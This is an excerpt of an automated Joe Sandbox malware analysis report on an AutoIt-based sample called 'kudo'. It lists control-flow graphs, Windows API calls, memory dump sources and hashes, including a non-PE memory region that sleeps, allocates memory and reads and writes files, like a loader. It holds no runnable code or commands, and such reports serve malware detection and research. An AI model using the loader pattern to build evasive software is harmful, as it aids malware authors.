                                                      control_flow_graph 1007 a3d9f8-a3da4a call a3d8f8 CreateFileW 1010 a3da53-a3da60 1007->1010 1011 a3da4c-a3da4e 1007->1011 1014 a3da73-a3da8a VirtualAlloc 1010->1014 1015 a3da62-a3da6e 1010->1015 1012 a3dbac-a3dbb0 1011->1012 1016 a3da93-a3dab9 CreateFileW 1014->1016 1017 a3da8c-a3da8e 1014->1017 1015->1012 1019 a3dabb-a3dad8 1016->1019 1020 a3dadd-a3daf7 ReadFile 1016->1020 1017->1012 1019->1012 1021 a3db1b-a3db1f 1020->1021 1022 a3daf9-a3db16 1020->1022 1024 a3db21-a3db3e 1021->1024 1025 a3db40-a3db57 WriteFile 1021->1025 1022->1012 1024->1012 1026 a3db82-a3dba7 CloseHandle VirtualFree 1025->1026 1027 a3db59-a3db80 1025->1027 1026->1012 1027->1012
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00A3DA3D
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457539916.0000000000A3D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_a3d000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                      • Instruction ID: 06e375d91b6f486a65cee9d911573adaa149c53cbebba7f66314edf4b3f9b435
                                                      • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                                      • Instruction Fuzzy Hash: 7D51F975A50208FBEF20DFA4DC49FDEB778AF48701F108554F61AEB180DA749A44DB64

                                                      Control-flow Graph

                                                      control_flow_graph 1047 8039d5-803a45 CreateWindowExW * 2 ShowWindow * 2
                                                      APIs
                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00803A03
                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00803A24
                                                      • ShowWindow.USER32(00000000), ref: 00803A38
                                                      • ShowWindow.USER32(00000000), ref: 00803A41
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Window$CreateShow
                                                      • String ID: AutoIt v3$edit
                                                      • API String ID: 1584632944-3779509399
                                                      • Opcode ID: f99c9c30b9f30afe52cc3b6c698ca4b60e65617d92dd2eab2e9b5ad5957df94b
                                                      • Instruction ID: 91addf3130cd1f95e526dae72384ee4ce267e45ec8f46b874a11a4b34a7193c8
                                                      • Opcode Fuzzy Hash: f99c9c30b9f30afe52cc3b6c698ca4b60e65617d92dd2eab2e9b5ad5957df94b
                                                      • Instruction Fuzzy Hash: 09F0DA715416907EEF316727AC49E6B3EBDF7C6F50F00412ABA04E2171C6752891DAB0

                                                      Control-flow Graph

                                                      control_flow_graph 1048 80407c-804092 1049 804098-8040ad call 807a16 1048->1049 1050 80416f-804173 1048->1050 1053 8040b3-8040d3 call 807bcc 1049->1053 1054 83d3c8-83d3d7 LoadStringW 1049->1054 1057 83d3e2-83d3fa call 807b2e call 806fe3 1053->1057 1058 8040d9-8040dd 1053->1058 1054->1057 1068 8040ed-80416a call 822de0 call 80454e call 822dbc Shell_NotifyIconW call 805904 1057->1068 1069 83d400-83d41e call 807cab call 806fe3 call 807cab 1057->1069 1060 8040e3-8040e8 call 807b2e 1058->1060 1061 804174-80417d call 808047 1058->1061 1060->1068 1061->1068 1068->1050 1069->1068
                                                      APIs
                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0083D3D7
                                                        • Part of subcall function 00807BCC: _memmove.LIBCMT ref: 00807C06
                                                      • _memset.LIBCMT ref: 008040FC
                                                      • _wcscpy.LIBCMT ref: 00804150
                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00804160
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                      • String ID: Line:
                                                      • API String ID: 3942752672-1585850449
                                                      • Opcode ID: 560a8a4f2576efa22a8c7605fa4674a43a19f52ef852342b87f7b3d30b695da0
                                                      • Instruction ID: 2fb0ee4287a84917368a580d049da7f609c78091439c637db7b5a6af5b6f9900
                                                      • Opcode Fuzzy Hash: 560a8a4f2576efa22a8c7605fa4674a43a19f52ef852342b87f7b3d30b695da0
                                                      • Instruction Fuzzy Hash: CF31A0B2408705AAD7A1EB64EC45FDB77E8FF44314F10451AB685D21D1EB70A688C793

                                                      Control-flow Graph

                                                      control_flow_graph 1142 82541d-825436 1143 825453 1142->1143 1144 825438-82543d 1142->1144 1145 825455-82545b 1143->1145 1144->1143 1146 82543f-825441 1144->1146 1147 825443-825448 call 828b28 1146->1147 1148 82545c-825461 1146->1148 1156 82544e call 828db6 1147->1156 1149 825463-82546d 1148->1149 1150 82546f-825473 1148->1150 1149->1150 1153 825493-8254a2 1149->1153 1154 825483-825485 1150->1154 1155 825475-825480 call 822de0 1150->1155 1159 8254a4-8254a7 1153->1159 1160 8254a9 1153->1160 1154->1147 1158 825487-825491 1154->1158 1155->1154 1156->1143 1158->1147 1158->1153 1161 8254ae-8254b3 1159->1161 1160->1161 1164 8254b9-8254c0 1161->1164 1165 82559c-82559f 1161->1165 1166 8254c2-8254ca 1164->1166 1167 825501-825503 1164->1167 1165->1145 1166->1167 1168 8254cc 1166->1168 1169 825505-825507 1167->1169 1170 82556d-82556e call 830ba7 1167->1170 1171 8254d2-8254d4 1168->1171 1172 8255ca 1168->1172 1173 82552b-825536 1169->1173 1174 825509-825511 1169->1174 1183 825573-825577 1170->1183 1178 8254d6-8254d8 1171->1178 1179 8254db-8254e0 1171->1179 1180 8255ce-8255d7 1172->1180 1176 82553a-82553d 1173->1176 1177 825538 1173->1177 1181 825513-82551f 1174->1181 1182 825521-825525 1174->1182 1184 8255a4-8255a8 1176->1184 1185 82553f-82554b call 8246e6 call 830e5b 1176->1185 1177->1176 1178->1179 1179->1184 1186 8254e6-8254ff call 830cc8 1179->1186 1180->1145 1187 825527-825529 1181->1187 1182->1187 1183->1180 1188 825579-82557e 1183->1188 1189 8255ba-8255c5 call 828b28 1184->1189 1190 8255aa-8255b7 call 822de0 1184->1190 1203 825550-825555 1185->1203 1202 825562-82556b 1186->1202 1187->1176 1188->1184 1193 825580-825591 1188->1193 1189->1156 1190->1189 1194 825594-825596 1193->1194 1194->1164 1194->1165 1202->1194 1204 82555b-82555e 1203->1204 1205 8255dc-8255e0 1203->1205 1204->1172 1206 825560 1204->1206 1205->1180 1206->1202
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                      • String ID:
                                                      • API String ID: 1559183368-0
                                                      • Opcode ID: 2ae4adc1162bedfe6bc9a4b740345a455ff32de3de61d0c655ced6f3c4ec0989
                                                      • Instruction ID: 9f0a094f49cf9064cf0d3e41be2ceab6228693adeea463916dc582922044740b
                                                      • Opcode Fuzzy Hash: 2ae4adc1162bedfe6bc9a4b740345a455ff32de3de61d0c655ced6f3c4ec0989
                                                      • Instruction Fuzzy Hash: 5A51C3B0A40B29DBCB249F69F98066EB7A2FF40335F248729F825D62D0D7709DD08B45

                                                      Control-flow Graph

                                                      control_flow_graph 1207 80686a-806891 call 804ddd 1210 83e031-83e041 call 86955b 1207->1210 1211 806897-8068a5 call 804ddd 1207->1211 1215 83e046-83e048 1210->1215 1211->1210 1216 8068ab-8068b1 1211->1216 1217 83e067-83e0af call 820db6 1215->1217 1218 83e04a-83e04d call 804e4a 1215->1218 1221 83e052-83e061 call 8642f8 1216->1221 1222 8068b7-8068d9 call 806a8c 1216->1222 1227 83e0b1-83e0bb 1217->1227 1228 83e0d4 1217->1228 1218->1221 1221->1217 1230 83e0cf-83e0d0 1227->1230 1231 83e0d6-83e0e9 1228->1231 1232 83e0d2 1230->1232 1233 83e0bd-83e0cc 1230->1233 1234 83e260-83e271 call 822d55 call 804e4a 1231->1234 1235 83e0ef 1231->1235 1232->1231 1233->1230 1245 83e273-83e283 call 807616 call 805d9b 1234->1245 1237 83e0f6-83e0f9 call 807480 1235->1237 1240 83e0fe-83e120 call 805db2 call 8673e9 1237->1240 1251 83e122-83e12f 1240->1251 1252 83e134-83e13e call 8673d3 1240->1252 1258 83e288-83e2b8 call 85f7a1 call 820e2c call 822d55 call 804e4a 1245->1258 1254 83e227-83e237 call 80750f 1251->1254 1260 83e140-83e153 1252->1260 1261 83e158-83e162 call 8673bd 1252->1261 1254->1240 1263 83e23d-83e25a call 80735d 1254->1263 1258->1245 1260->1254 1270 83e176-83e180 call 805e2a 1261->1270 1271 83e164-83e171 1261->1271 1263->1234 1263->1237 1270->1254 1276 83e186-83e19e call 85f73d 1270->1276 1271->1254 1282 83e1c1-83e1c4 1276->1282 1283 83e1a0-83e1bf call 807de1 call 805904 1276->1283 1285 83e1f2-83e1f5 1282->1285 1286 83e1c6-83e1e1 call 807de1 call 806839 call 805904 1282->1286 1307 83e1e2-83e1f0 call 805db2 1283->1307 1288 83e1f7-83e200 call 85f65e 1285->1288 1289 83e215-83e218 call 86737f 1285->1289 1286->1307 1288->1258 1301 83e206-83e210 call 820e2c 1288->1301 1294 83e21d-83e226 call 820e2c 1289->1294 1294->1254 1301->1240 1307->1294
                                                      APIs
                                                        • Part of subcall function 00804DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,008C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00804E0F
                                                      • _free.LIBCMT ref: 0083E263
                                                      • _free.LIBCMT ref: 0083E2AA
                                                        • Part of subcall function 00806A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00806BAD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: _free$CurrentDirectoryLibraryLoad
                                                      • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                      • API String ID: 2861923089-1757145024
                                                      • Opcode ID: f526fa03061998cd83061abe549898df25e58eaafa7c6c45c510b33316e107ad
                                                      • Instruction ID: 78a7d5e5f0fa65ae1a607c131a9364d1b4ad713ce6482d53218740aaae8bea3c
                                                      • Opcode Fuzzy Hash: f526fa03061998cd83061abe549898df25e58eaafa7c6c45c510b33316e107ad
                                                      • Instruction Fuzzy Hash: 18913871900219AFCF04EFA8DC919EEB7B8FF54314F10442AF815EB2A1DB74A955CB91

                                                      Control-flow Graph

                                                      control_flow_graph 1311 a3f4c8-a3f640 call a3d0d8 call a3f3b8 CreateFileW 1318 a3f642 1311->1318 1319 a3f647-a3f657 1311->1319 1320 a3f712-a3f717 1318->1320 1322 a3f659 1319->1322 1323 a3f65e-a3f678 VirtualAlloc 1319->1323 1322->1320 1324 a3f67a 1323->1324 1325 a3f67f-a3f696 ReadFile 1323->1325 1324->1320 1326 a3f69a-a3f6af call a3e148 1325->1326 1327 a3f698 1325->1327 1329 a3f6b4-a3f6ec call a3f3f8 call a3f168 1326->1329 1327->1320 1334 a3f708-a3f710 1329->1334 1335 a3f6ee-a3f703 call a3f448 1329->1335 1334->1320 1335->1334
                                                      APIs
                                                        • Part of subcall function 00A3F3B8: Sleep.KERNEL32(000001F4), ref: 00A3F3C9
                                                      • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00A3F633
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457539916.0000000000A3D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_a3d000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CreateFileSleep
                                                      • String ID: VN05ZPDE5CBL2F09SR2K77RU442VZR
                                                      • API String ID: 2694422964-2707439306
                                                      • Opcode ID: efdfaf9201dfe7beccb311615f10bc3b5b1efd7c7713f520fa862aa830e0b6c4
                                                      • Instruction ID: afd43da65933984e8863fb05fc8c79d9370d1191b7b24b663e9b1c4ec8c3e759
                                                      • Opcode Fuzzy Hash: efdfaf9201dfe7beccb311615f10bc3b5b1efd7c7713f520fa862aa830e0b6c4
                                                      • Instruction Fuzzy Hash: A171B130D14288DAEF11DBB4C945BDFBBB9AF15304F044199E6487B2C1D7BA0B09CBA6
                                                      APIs
                                                      • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,008035A1,SwapMouseButtons,00000004,?), ref: 008035D4
                                                      • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,008035A1,SwapMouseButtons,00000004,?,?,?,?,00802754), ref: 008035F5
                                                      • RegCloseKey.ADVAPI32(00000000,?,?,008035A1,SwapMouseButtons,00000004,?,?,?,?,00802754), ref: 00803617
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: Control Panel\Mouse
                                                      • API String ID: 3677997916-824357125
                                                      • Opcode ID: ea272adf874f14ae40f7bb466bb2a80176d9332c82ece6cd1d60792e6666973b
                                                      • Instruction ID: f75672802f09a817490aa4cc54c1d10cc760e10365e92d84573ad9ee26e4e74e
                                                      • Opcode Fuzzy Hash: ea272adf874f14ae40f7bb466bb2a80176d9332c82ece6cd1d60792e6666973b
                                                      • Instruction Fuzzy Hash: 12114871510608BFDB218FA8DC409AEB7BCFF14740F104469F905E7250D6729E40A760
                                                      APIs
                                                        • Part of subcall function 00804EE5: _fseek.LIBCMT ref: 00804EFD
                                                        • Part of subcall function 00869734: _wcscmp.LIBCMT ref: 00869824
                                                        • Part of subcall function 00869734: _wcscmp.LIBCMT ref: 00869837
                                                      • _free.LIBCMT ref: 008696A2
                                                      • _free.LIBCMT ref: 008696A9
                                                      • _free.LIBCMT ref: 00869714
                                                        • Part of subcall function 00822D55: HeapFree.KERNEL32(00000000,00000000), ref: 00822D69
                                                        • Part of subcall function 00822D55: GetLastError.KERNEL32(00000000,?,00829A24), ref: 00822D7B
                                                      • _free.LIBCMT ref: 0086971C
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                      • String ID:
                                                      • API String ID: 1552873950-0
                                                      • Opcode ID: dc3722f5eff0e81c698cf7f9501b00b84511826997b887124672bf27af1010f7
                                                      • Instruction ID: 67706956afbd6358d3d43c670b221cf8614eda5fc495c227767f6dd3a3fe2fd5
                                                      • Opcode Fuzzy Hash: dc3722f5eff0e81c698cf7f9501b00b84511826997b887124672bf27af1010f7
                                                      • Instruction Fuzzy Hash: 1D514CB1904219AFDF249F68DC81A9EBBB9FF48300F10449EF249E3281DB715A90CF59
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                      • String ID:
                                                      • API String ID: 2782032738-0
                                                      • Opcode ID: b86a2bf7579e7a03abf9a7817f5cbb14d02551d5049f523e8648adc105e96e29
                                                      • Instruction ID: 1416a75f5b83d65f4dedffecb7718a5220573ef89e456647f67f205a76741e28
                                                      • Opcode Fuzzy Hash: b86a2bf7579e7a03abf9a7817f5cbb14d02551d5049f523e8648adc105e96e29
                                                      • Instruction Fuzzy Hash: 9A41D374B1076A9FDB18CF69E8809AE7BA5FF45364B24913DE825C7640DB70DDC08B60
                                                      APIs
                                                      • _memset.LIBCMT ref: 0083EA39
                                                      • 75B0A2D5.COMDLG32(?), ref: 0083EA83
                                                        • Part of subcall function 00804750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00804743,?,?,008037AE,?), ref: 00804770
                                                        • Part of subcall function 00820791: GetLongPathNameW.KERNEL32(?,?,00007FFF,?,?,?,008072BD,00000001,008C6290,?,00803BBB,008C52F8,008C52E0,?,?), ref: 008207B0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: NamePath$FullLong_memset
                                                      • String ID: X
                                                      • API String ID: 3051022977-3081909835
                                                      • Opcode ID: 36f20db14e3a04b7e8c080f62f8f8a001dfc9dc7a5808455f8c5e7a973f5ada1
                                                      • Instruction ID: 824ec198d9ffe63a07345697d29176dee1f30d15f1b63435fe5a0f03686f0f08
                                                      • Opcode Fuzzy Hash: 36f20db14e3a04b7e8c080f62f8f8a001dfc9dc7a5808455f8c5e7a973f5ada1
                                                      • Instruction Fuzzy Hash: F2216F71A102589BDB419B98DC45AEE7BF8FF49714F004059E508E7281DBB459898FA2
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: __fread_nolock_memmove
                                                      • String ID: EA06
                                                      • API String ID: 1988441806-3962188686
                                                      • Opcode ID: 7cd9bb6f3a281355932e1c74bfb01ef743bec90585fae4440d62f7ef49da8270
                                                      • Instruction ID: b7b6c646c0e9c3387c970457b1c2a459f0e4598795a2b0351ca22ad9840865e9
                                                      • Opcode Fuzzy Hash: 7cd9bb6f3a281355932e1c74bfb01ef743bec90585fae4440d62f7ef49da8270
                                                      • Instruction Fuzzy Hash: B501F971804228BEDB18CAA8D816EFE7BFCEB11301F00419AF556D2281E874E6048B60
                                                      APIs
                                                        • Part of subcall function 0082571C: __FF_MSGBANNER.LIBCMT ref: 00825733
                                                        • Part of subcall function 0082571C: __NMSG_WRITE.LIBCMT ref: 0082573A
                                                        • Part of subcall function 0082571C: RtlAllocateHeap.NTDLL(009E0000,00000000,00000001), ref: 0082575F
                                                      • std::exception::exception.LIBCMT ref: 00820DEC
                                                      • __CxxThrowException@8.LIBCMT ref: 00820E01
                                                        • Part of subcall function 0082859B: RaiseException.KERNEL32(?,?,00000000,008B9E78,?,00000001,?,?,?,00820E06,00000000,008B9E78,00809E8C,00000001), ref: 008285F0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                      • String ID: bad allocation
                                                      • API String ID: 3902256705-2104205924
                                                      • Opcode ID: 55d689632686b2609276c240349772dd4aaa68d849c6ef7bec23ca203e8958cd
